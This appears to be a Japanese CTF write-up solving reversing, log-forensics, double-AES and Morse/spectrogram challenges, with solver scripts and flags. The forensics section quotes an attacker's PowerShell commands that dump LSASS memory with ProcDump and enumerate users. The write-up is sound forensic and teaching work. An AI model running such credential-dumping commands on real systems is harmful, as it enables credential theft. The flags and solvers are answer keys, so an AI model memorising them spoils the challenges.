001045d4 30 78 38 33 int8_t[4] "0x83" [365] 001045d8 30 78 32 31 int8_t[4] "0x21" [366] 001045dc 30 78 66 36 int8_t[4] "0xf6" [367] 001045e0 30 78 31 64 int8_t[4] "0x1d" [368] 001045e4 30 78 36 35 int8_t[4] "0x65" [369] 001045e8 30 78 63 63 int8_t[4] "0xcc" [370] 001045ec 30 78 34 64 int8_t[4] "0x4d" [371] 001045f0 30 78 35 31 int8_t[4] "0x51" [372] 001045f4 30 78 39 37 int8_t[4] "0x97" [373] 001045f8 30 78 30 31 int8_t[4] "0x01" [374] 001045fc 30 78 30 36 int8_t[4] "0x06" [375] 00104600 30 78 62 33 int8_t[4] "0xb3" [376] 00104604 30 78 37 64 int8_t[4] "0x7d" [377] 00104608 30 78 36 34 int8_t[4] "0x64" [378] 0010460c 30 78 37 62 int8_t[4] "0x7b" [379] 00104610 30 78 35 39 int8_t[4] "0x59" [380] 00104614 30 78 33 30 int8_t[4] "0x30" [381] 00104618 30 78 64 62 int8_t[4] "0xdb" [382] 0010461c 30 78 30 35 int8_t[4] "0x05" [383] 00104620 30 78 33 31 int8_t[4] "0x31" [384] 00104624 30 78 64 65 int8_t[4] "0xde" [385] 00104628 30 78 35 39 int8_t[4] "0x59" [386] 0010462c 30 78 33 34 int8_t[4] "0x34" [387] 00104630 30 78 31 35 int8_t[4] "0x15" [388] 00104634 30 78 65 36 int8_t[4] "0xe6" [389] 00104638 30 78 32 37 int8_t[4] "0x27" [390] 0010463c 30 78 64 66 int8_t[4] "0xdf" [391] 00104640 30 78 39 30 int8_t[4] "0x90" [392] 00104644 30 78 31 38 int8_t[4] "0x18" [393] 00104648 30 78 35 65 int8_t[4] "0x5e" [394] 0010464c 30 78 33 62 int8_t[4] "0x3b" [395] 00104650 30 78 37 64 int8_t[4] "0x7d" [396] 00104654 30 78 38 33 int8_t[4] "0x83" [397] 00104658 30 78 34 33 int8_t[4] "0x43" [398] 0010465c 30 78 65 38 int8_t[4] "0xe8" [399] 00104660 30 78 37 38 int8_t[4] "0x78" [400] 00104664 30 78 32 64 int8_t[4] "0x2d" [401] 00104668 30 78 32 64 int8_t[4] "0x2d" [402] 0010466c 30 78 30 63 int8_t[4] "0x0c" [403] 00104670 30 78 35 33 int8_t[4] "0x53" [404] 00104674 30 78 38 37 int8_t[4] "0x87" [405] 00104678 30 78 64 31 int8_t[4] "0xd1" [406] 0010467c 30 78 61 32 int8_t[4] "0xa2" [407] 00104680 30 78 33 34 int8_t[4] "0x34" [408] 00104684 30 78 32 61 int8_t[4] "0x2a" [409] 00104688 30 78 31 34 int8_t[4] "0x14" [410] 0010468c 30 78 66 61 int8_t[4] "0xfa" [411] 00104690 30 78 62 33 int8_t[4] "0xb3" [412] 00104694 30 78 34 37 int8_t[4] "0x47" [413] 00104698 30 78 64 31 int8_t[4] "0xd1" [414] 0010469c 30 78 31 39 int8_t[4] "0x19" [415] 001046a0 30 78 38 37 int8_t[4] "0x87" [416] 001046a4 30 78 62 34 int8_t[4] "0xb4" [417] 001046a8 30 78 37 66 int8_t[4] "0x7f" [418] 001046ac 30 78 62 38 int8_t[4] "0xb8" [419] 001046b0 30 78 65 33 int8_t[4] "0xe3" [420] 001046b4 30 78 63 34 int8_t[4] "0xc4" [421] 001046b8 30 78 66 31 int8_t[4] "0xf1" [422] 001046bc 30 78 62 35 int8_t[4] "0xb5" [423] 001046c0 30 78 39 34 int8_t[4] "0x94" [424] 001046c4 30 78 38 62 int8_t[4] "0x8b" [425] 001046c8 30 78 61 61 int8_t[4] "0xaa" [426] 001046cc 30 78 35 39 int8_t[4] "0x59" [427] 001046d0 30 78 38 35 int8_t[4] "0x85" [428] 001046d4 30 78 61 33 int8_t[4] "0xa3" [429] 001046d8 30 78 30 34 int8_t[4] "0x04" [430] 001046dc 30 78 37 61 int8_t[4] "0x7a" [431] 001046e0 30 78 36 31 int8_t[4] "0x61" [432] 001046e4 30 78 65 35 int8_t[4] "0xe5" [433] 001046e8 30 78 38 36 int8_t[4] "0x86" [434] 001046ec 30 78 65 37 int8_t[4] "0xe7" [435] 001046f0 30 78 34 31 int8_t[4] "0x41" [436] 001046f4 30 78 36 35 int8_t[4] "0x65" [437] 001046f8 30 78 33 30 int8_t[4] "0x30" [438] 001046fc 30 78 65 63 int8_t[4] "0xec" [439] 00104700 30 78 34 66 int8_t[4] "0x4f" [440] 00104704 30 78 36 31 int8_t[4] "0x61" [441] 00104708 30 78 38 36 int8_t[4] "0x86" [442] 0010470c 30 78 34 63 int8_t[4] "0x4c" [443] 00104710 30 78 32 66 int8_t[4] "0x2f" [444] 00104714 30 78 35 61 int8_t[4] "0x5a" [445] 00104718 30 78 30 62 int8_t[4] "0x0b" [446] 0010471c 30 78 34 32 int8_t[4] "0x42" [447] 00104720 30 78 37 36 int8_t[4] "0x76" [448] 00104724 30 78 32 30 int8_t[4] "0x20" [449]
インデックスが9で割り切れる箇所の文字を抽出し、結合する。
#!/usr/bin/env python3 verify = [ 0x43, 0xf1, 0x25, 0x0b, 0xac, 0xa2, 0x2e, 0xb6, 0xb2, 0x54, 0x3a, 0x7d, 0x4f, 0x6e, 0x1d, 0x2e, 0x7e, 0xd1, 0x46, 0x8a, 0x08, 0xa3, 0x60, 0x97, 0x33, 0x8b, 0x1a, 0x7b, 0xb7, 0x8c, 0x4a, 0x82, 0x2f, 0x9b, 0xb1, 0x44, 0x66, 0xc9, 0x51, 0xd3, 0x9c, 0x4b, 0x69, 0xde, 0x0c, 0x65, 0x05, 0x6a, 0x4f, 0x37, 0x17, 0x00, 0x67, 0x23, 0x34, 0x11, 0xf0, 0x6d, 0x65, 0x81, 0x40, 0xc8, 0xc9, 0x30, 0xa7, 0xd3, 0x4e, 0xc5, 0xc0, 0x0d, 0x2f, 0x97, 0x32, 0x5f, 0x1b, 0xbe, 0x25, 0x1a, 0x26, 0x58, 0x05, 0x31, 0xa8, 0x29, 0x09, 0x9e, 0xf6, 0xb6, 0xbc, 0x68, 0x38, 0xf5, 0xc4, 0x36, 0x81, 0x29, 0xdc, 0x65, 0x44, 0x33, 0x8e, 0x31, 0x89, 0x6d, 0x22, 0xda, 0x92, 0x87, 0x65, 0x57, 0xe2, 0x10, 0x58, 0x35, 0x2e, 0x65, 0xc8, 0x61, 0xc5, 0x10, 0x20, 0x6f, 0x45, 0x80, 0x2a, 0xc5, 0x33, 0x42, 0xcc, 0xd8, 0xf3, 0xc0, 0x59, 0xfb, 0x7a, 0x30, 0x3c, 0xed, 0xef, 0xdf, 0x02, 0xb2, 0x21, 0x1a, 0x34, 0x4c, 0xfb, 0x52, 0x02, 0x2f, 0x4a, 0xd3, 0x8a, 0x31, 0xab, 0xf3, 0x1b, 0x0a, 0x57, 0xcc, 0x7e, 0xec, 0x37, 0x5c, 0xa2, 0xe9, 0x6b, 0xbb, 0x47, 0x49, 0x55, 0x66, 0xef, 0x04, 0x39, 0xde, 0x15, 0xc3, 0xf0, 0x97, 0x35, 0xfd, 0x47, 0x28, 0xcd, 0x33, 0x38, 0x2a, 0x8e, 0x64, 0x29, 0xa3, 0x91, 0xf6, 0x9e, 0xd6, 0xee, 0x86, 0x33, 0xb4, 0xbd, 0x5b, 0xa7, 0x6b, 0xfd, 0xfd, 0x02, 0x33, 0x44, 0xfd, 0x1f, 0x5d, 0x4b, 0xe2, 0x9c, 0x1f, 0x33, 0x2e, 0x91, 0xf5, 0x83, 0xe6, 0x97, 0xad, 0x0b, 0x62, 0x19, 0x58, 0xb4, 0x65, 0xc6, 0x8c, 0xcc, 0x84, 0x34, 0x63, 0xcd, 0xcc, 0xd3, 0xdf, 0xec, 0x6a, 0xfa, 0x30, 0x53, 0x29, 0x4e, 0x97, 0x1d, 0x53, 0x6f, 0x61, 0x63, 0xd5, 0x6a, 0x1a, 0x1d, 0xdf, 0xea, 0x58, 0xcf, 0x32, 0x2e, 0x86, 0x7b, 0x99, 0x2b, 0x94, 0x78, 0xf4, 0x32, 0xce, 0x15, 0x36, 0x96, 0x93, 0x54, 0x33, 0xa5, 0x64, 0x5d, 0xe2, 0x47, 0x8d, 0x69, 0xa0, 0xf8, 0xe9, 0x39, 0xbb, 0x01, 0xdb, 0x1e, 0xd7, 0x8a, 0x5c, 0xba, 0x62, 0xaf, 0x70, 0x41, 0xcd, 0x7e, 0x44, 0xf5, 0x09, 0x32, 0xad, 0xb3, 0x97, 0xce, 0x68, 0xfc, 0x3b, 0xe9, 0x36, 0x2b, 0xea, 0x93, 0x90, 0x3f, 0x0b, 0xd5, 0xe0, 0x63, 0x61, 0x6b, 0x9f, 0x79, 0x48, 0x43, 0x68, 0x32, 0x31, 0x02, 0xc1, 0xf4, 0x39, 0xec, 0x3b, 0x0c, 0xde, 0x61, 0x08, 0xa6, 0x3a, 0x88, 0xb6, 0x08, 0xb9, 0x49, 0x65, 0x0d, 0x92, 0x7e, 0x21, 0x14, 0x17, 0xeb, 0xe3, 0x62, 0xea, 0xfb, 0x7f, 0x0e, 0x83, 0x21, 0xf6, 0x1d, 0x65, 0xcc, 0x4d, 0x51, 0x97, 0x01, 0x06, 0xb3, 0x7d, 0x64, 0x7b, 0x59, 0x30, 0xdb, 0x05, 0x31, 0xde, 0x59, 0x34, 0x15, 0xe6, 0x27, 0xdf, 0x90, 0x18, 0x5e, 0x3b, 0x7d, 0x83, 0x43, 0xe8, 0x78, 0x2d, 0x2d, 0x0c, 0x53, 0x87, 0xd1, 0xa2, 0x34, 0x2a, 0x14, 0xfa, 0xb3, 0x47, 0xd1, 0x19, 0x87, 0xb4, 0x7f, 0xb8, 0xe3, 0xc4, 0xf1, 0xb5, 0x94, 0x8b, 0xaa, 0x59, 0x85, 0xa3, 0x04, 0x7a, 0x61, 0xe5, 0x86, 0xe7, 0x41, 0x65, 0x30, 0xec, 0x4f, 0x61, 0x86, 0x4c, 0x2f, 0x5a, 0x0b, 0x42, 0x76, 0x20 ] flag = '' for i in range(0, len(verify), 9): flag += chr(verify[i]) if flag[-1] == '}': break print(flag)
CTF{fe402183ea30417f5d333b40c22d9b26c1aebed4}
log-forensics (Forensics)
ディスク上のファイルやシステム情報と一部のログ情報があるので、5つの質問に答える。
1問目は「ターゲットシステム上のlsassプロセスをダンプするために使用される完全なコマンドは何か」という問題。
PhysicalDrive0_0\PowerShellHistory\Users\bitsentinel\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
を見ると、終わりの方に以下のように書いてある。
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip"-OutFile "$env:TEMP\procdump.zip" Expand-Archive "C:\Users\BITSEN~1\AppData\Local\Temp\procdump.zip" $env:TEMP\Procdump -Force C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe passwords.txt ls C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe passwords C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe psexec.exe -s -d -i lsass.exe C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump64.exe -s -d -i lsass.exe C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump64.exe -ma lsass.exe lsass.txt
procdump64.exe -ma lsass.exe lsass.txt
2問目は「侵害されたコンピュータのIPアドレスは何か」という問題。
PhysicalDrive0_0\Config\Windows\System32\config\SYSTEMをRegistry Viewerで開く。SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfacesの下に、2つインタフェースがある。IPアドレスが設定されているのは片方だけで、IPAddressに以下が設定されている。
10.0.8.16
3問目は「すべてのシステムユーザーを列挙するために攻撃者が使用するコマンドは何か」という問題。
すべてのシステムユーザを列挙するコマンドについても、以下のファイルを見れば書いてある。
PhysicalDrive0_0\PowerShellHistory\Users\bitsentinel\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net users
4問目は「OSパスワードがダンプされた場合、どのMITRE テクニックを割り当てることができるか」という問題。
フラグ形式は「
MITRE ATT&CKを調べればよい。
T1003:OS Credential Dumping
5問目は「攻撃者が侵害されたシステム上の既存のローカルグループを列挙しようとしたときにトリガーされたWindowsセキュリティイベントコードは何か」という問題。
これはインターネット上で調べればわかる。
4798
4aes (Cryptography)
plainを暗号化したものと、b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s'を復号したものが一致する鍵の組み合わせを探す。あとはその鍵を使ってフラグを生成する。
#!/usr/bin/env python3 from Crypto.Util.number import * from Crypto.Cipher import AES import hashlib try_pt = b'This is a non-secret message....' try_ct = b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s' encs = [] for i in range(256**3): k1 = long_to_bytes(i).rjust(3, b'\x00') + b"A" * 29 cipher = AES.new(k1, mode=AES.MODE_ECB) ct = cipher.encrypt(try_pt) encs.append(ct) for i in range(256**3): k2 = long_to_bytes(i).rjust(3, b'\x00') + b"A" * 29 cipher = AES.new(k2, mode=AES.MODE_ECB) ct = cipher.decrypt(try_ct) if ct in encs: index = encs.index(ct) k1 = long_to_bytes(index).rjust(3, b'\x00') + b"A" * 29 break sha256 = hashlib.sha256(k1 + k2).hexdigest() print("CTF{" + sha256 + "}")
CTF{91e6611654e4fe66d6876f728b8dfd54999ed752f89239ab82ecd9e520c1e003}
morse-music (Steganography, Cryptography)
wavファイルにあるモールス信号をhttps://morsecode.world/international/decoder/audio-decoder-adaptive.htmlでデコードする。
DID YOU KNOW THAT THIS IS NOT ABOUT THE MORSE CODE? IT IS ABOUT THE SPECTROGRAM ONLY THAT THE PASSWORD IS UHR3V8203RJD
Audacityで開き、スペクトログラムを確認する。サンプル周波数を調整すると、QRコードが見えた。
QRコードを読み取ると、以下のデータを取得できた。
Njw0SGcLVwJVZ358MC0xBmUMClMKanlzZSpnAjVeBgVRMX0lYyliA2RaB1UDY3ghMHw0UGUPAQAHNysnNClmAjMPA1VO
このデータをbase64デコードしたものとモールス信号のデコードで取得したパスワードをXORする。
#!/usr/bin/env python3 from base64 import * password = b'UHR3V8203RJD' ct = 'Njw0SGcLVwJVZ358MC0xBmUMClMKanlzZSpnAjVeBgVRMX0lYyliA2RaB1UDY3ghMHw0UGUPAQAHNysnNClmAjMPA1VO' ct = b64decode(ct) flag = '' for i in range(len(ct)): flag += chr(ct[i] ^ password[i % len(password)]) print(flag)
ctf{13e2f548eec5348c98370b51cf45bc7a6a002b5e012ee4fc37304eacaa41e71e}